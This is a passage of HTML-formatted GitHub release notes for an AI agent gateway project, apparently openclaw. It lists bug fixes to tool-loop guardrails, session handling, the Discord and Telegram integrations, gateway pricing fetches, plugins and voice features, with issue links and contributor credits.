data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
